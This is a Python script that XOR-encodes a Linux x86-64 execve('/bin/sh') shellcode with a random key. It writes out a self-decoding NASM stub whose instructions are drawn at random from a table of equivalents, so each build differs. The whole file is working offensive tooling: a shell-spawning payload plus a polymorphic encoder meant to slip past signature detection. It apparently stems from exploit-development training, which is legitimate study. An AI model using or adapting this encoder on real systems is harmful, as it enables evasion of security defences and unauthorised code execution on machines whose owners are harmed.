
#!/usr/bin/python
from random import randint
# Output buffers for the two textual renderings of the encoded payload:
# `encoded` collects "\xNN" escapes, `encoded2` a comma-separated "0xNN" list.
encoded = ""
encoded2 = ""

# Byte values that must never appear in the encoded output.
bad_chars = [0x00]

# Payload to encode: a leading 0x90 marker byte (the decoder brute-forces the
# key until this byte reappears) followed by an execve("//bin/sh") stub.
shellcode = (
    "\x90"
    "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68"
    "\x53\x54\x5f\x52\x54\x5e\x57\x54\x5a\x0f\x05"
)
def valid(byte):
    """Return True when *byte* is not listed in the module-level bad_chars.

    Args:
        byte: integer byte value to check.

    Returns:
        False if any entry of bad_chars compares equal to *byte*, else True.
    """
    return all(ch != byte for ch in bad_chars)
# Draw a one-byte XOR key at random and keep re-drawing until every encoded
# byte stays clear of bad_chars.  Note that R may be 0, in which case the
# "encoded" bytes are identical to the original payload.
valid_R = False
while not valid_R:
    R = randint(0, 0xff)
    print("")
    print("random generated number (key): 0x%02x" % R)
    # XOR every payload byte with the candidate key; abandon the key at the
    # first result that hits a bad char.
    xored = []
    valid_R = True
    for x in bytearray(shellcode):
        y = x ^ R
        if not valid(y):
            valid_R = False
            break
        xored.append(y)
    if valid_R:
        # Same bytes in two textual forms: "\xNN" escapes and a "0xNN" list.
        encoded = "".join("\\x%02x" % y for y in xored)
        encoded2 = ",".join("0x%02x" % y for y in xored)
    else:
        encoded = ""
        encoded2 = ""

print("Encoded shellcode ...")
print(encoded)
print(encoded2)
print("")
print("Len: %d" % len(bytearray(shellcode)))
print("")
# Indent prefixed to every generated instruction line.
tab = " "


def _asm(*lines):
    """Render instruction lines with the indent used in the generated .nasm."""
    return "".join(tab + line + "\n" for line in lines)


# Polymorphism table: each key names an instruction slot of the decoder and
# maps to a list of equivalent NASM snippets; poly() picks one at random.
# Placeholders <param1>/<param2> are substituted by poly().  The alternatives
# use r9/r9b and ah as scratch registers.  The "push <number>|pop <param2>"
# key still spells the number as <param1> inside its templates.
poly_db = {
    "pop rdi": [
        _asm("pop rdi"),
        _asm("mov rdi,[rsp]", "add rsp,8"),
    ],
    "push <param1>|pop <param2>": [
        _asm("push <param1>", "pop <param2>"),
        _asm("mov <param2>,<param1>"),
    ],
    "mov byte dl,[rdi]": [
        _asm("mov byte dl,[rdi]"),
        _asm("mov r9,rdi", "mov byte dl,[r9]"),
    ],
    "xor rdi,rdi": [
        _asm("xor rdi,rdi"),
        _asm("sub rdi,rdi"),
    ],
    "inc rdi": [
        _asm("inc rdi"),
        _asm("dec rdi", "add rdi,2"),
    ],
    "mov byte <param1>,byte <param2>": [
        _asm("mov <param1>,<param2>"),
        _asm("mov r9b,<param2>", "mov <param1>,r9b"),
    ],
    "xor al,dil": [
        _asm("xor al,dil"),
        _asm("mov r9b,dil", "xor al,r9b"),
    ],
    "cmp al,0x90": [
        _asm("cmp al,0x90"),
        _asm("mov ah,0xff", "cmp ax,0xff90"),
    ],
    "push <number>|pop <param2>": [
        _asm("push <param1>", "pop <param2>"),
        _asm("xor <param2>,<param2>", "add <param2>,<param1>"),
    ],
    "xor byte [rdi],al": [
        _asm("xor byte [rdi],al"),
        _asm("mov byte r9b,[rdi]", "xor r9b,al", "mov byte [rdi],r9b"),
    ],
    "loop decode": [
        _asm("loop decode"),
        _asm("dec rcx", "xor r9,r9", "cmp r9,rcx", "jne decode"),
    ],
}
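def poly(instruction, param1="", param2="", param3=""):
    """Return one randomly chosen assembly rendering of *instruction*.

    Looks *instruction* up in the module-level poly_db table, picks one of
    its equivalent snippets at random and substitutes the ``<param1>``,
    ``<param2>`` and ``<param3>`` placeholders.

    Args:
        instruction: key into poly_db.
        param1, param2, param3: replacement text for the placeholders.  A
            placeholder the chosen snippet does not contain is simply
            ignored; no snippet in poly_db currently uses ``<param3>``.

    Returns:
        The substituted snippet, already indented and newline-terminated.

    Raises:
        KeyError: if *instruction* is not a key of poly_db.
    """
    options = poly_db[instruction]
    # Local used to be named `str`, shadowing the builtin; renamed to `text`.
    text = options[randint(0, len(options) - 1)]
    for placeholder, value in (
        ("<param1>", param1),
        ("<param2>", param2),
        ("<param3>", param3),
    ):
        text = text.replace(placeholder, value)
    return text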
# Assemble the self-decoding NASM stub as a list of fragments.  poly() is
# invoked in exactly the original order, so each random draw still lands on
# the same instruction slot.
_decoder_parts = [
    "global _start \n",
    "\n",
    "section .text\n",
    "\n",
    "_start:\n",
    " jmp short find_address\n",
    "decoder:\n",
    " ; Get the address of the string \n",
    # jmp/call/pop: rdi <- address of the `encoded` bytes pushed by
    # `call decoder`; rbx keeps a copy for the final jump.
    poly("pop rdi"),
    poly("push <param1>|pop <param2>", "rdi", "rbx"),
    "\n",
    " ; get the first byte and bruteforce till you get the token 0x90\n",
    # dl <- first encoded byte; rdi is the candidate key counted up from 0x00.
    poly("mov byte dl,[rdi]"),
    poly("xor rdi,rdi"),  # key that will be incremented from 0x00 to 0xff
    "bruteforce:\n",
    poly("inc rdi"),
    poly("mov byte <param1>,byte <param2>", "al", "dl"),
    poly("xor al,dil"),
    poly("cmp al,0x90"),
    " jne bruteforce\n",
    "\n",
    # rcx <- payload length, al <- recovered key, rdi <- start of the bytes.
    poly("push <number>|pop <param2>", str(len(bytearray(shellcode))), "rcx"),
    poly("mov byte <param1>,byte <param2>", "al", "dil"),
    poly("push <param1>|pop <param2>", "rbx", "rdi"),
    "decode:\n",
    # In-place XOR of every byte with the key, i.e. the stub rewrites the
    # `encoded` bytes that sit right after `call decoder`.
    poly("xor byte [rdi],al"),
    poly("inc rdi"),
    poly("loop decode"),
    "\n",
    " jmp rbx\n",  # jmp to decoded shellcode
    " \n",
    "find_address:\n",
    " call decoder\n",
    " encoded db " + encoded2 + "\n",
]
code = "".join(_decoder_parts)
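# Write the generated assembly to decoder.nasm.  The with-block guarantees the
# handle is flushed and closed; the previous version never closed it and relied
# on interpreter shutdown to flush the buffer.
with open("decoder.nasm", "w") as fout:
    fout.write(code)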